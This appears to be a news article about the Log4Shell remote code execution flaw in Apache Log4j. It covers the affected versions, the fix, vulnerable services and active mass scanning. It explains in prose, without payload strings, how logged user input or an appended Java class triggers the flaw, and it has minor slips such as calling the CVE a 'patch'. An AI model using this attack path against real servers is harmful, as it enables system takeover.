From times and times, we see new exploits emerging and proving how problematic they can be in the hands of bad people. The situation is even more critical when we’re talking about a Zero-day exploit. The latest exploit has been discovered in Apache’s Log4j logging library. A proof-of-concept exploit was shared online. It reveals the true potential of remote code execution attacks, and it has affected some of the largest services on the web. The exploit has been identified as “actively being exploited”, carries the “Log4Shell” moniker, and is one of the most dangerous exploits to be made public in recent years. It can affect basically everything from Apple devices to simple apps and games like Minecraft.
For those unaware, Log4j is a popular Java-based logging package. Apache Software Foundation is the developer behind it. It’s a CVE-2021-44228 patch that affects all versions of Log4j between version 2.0-beta9 and version 2.14.1. It has been patched in the most recent version of the library, version 2.15.0. However, many services and applications currently rely on Log4j. That goes from an Apple device to games like Minecraft. Cloud services such as Steam and Apple iCloud are also on the list of vulnerable, and we assume it also goes for everyone using Apache Struts. Even changing an iPhone’s name is capable of triggering the vulnerability on Apple’s servers.
— Cas van Cooten (@chvancooten) December 10, 2021
Chen Zhaojun of the Alibaba Cloud Security Team was the first to discover this issue. According to the report, any service that logs user-controlled strings is currently vulnerable to the exploit. The longing of the user-controlled string is a common practice by system administrators. It helps to spot potential platform abuse. Further, they use it to clean user input and ensure that there is nothing harmful to the software.
A simple action like changing iPhone’s name can trigger the Log4Shell exploit
The exploit carries the “Log4Shell” moniker, as it’s an unauthenticated RCE vulnerability that allows for total system takeover. There’s already a proof-of-concept exploit online. It’s ridiculously easy to demonstrate that it works through the use of DNS logging software.
As per a quote from Bleeping Computer, ransomware actors will begin leveraging this vulnerability immediately. In fact, malicious actors are already mass-scanning the web to try and find servers to exploit. It’s similar to other high-profile vulnerabilities including Heartbleed and Shellshock. Worth noting that, according to LunaSec, some Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 are less affected in theory, though hackers may still be able to work around the limitations.
As aforementioned, one can simply trigger Log4Shell by changing an iPhone’s name. Moreover, if a Java class is appended to the end of the URL, then that class will be injected into the server process.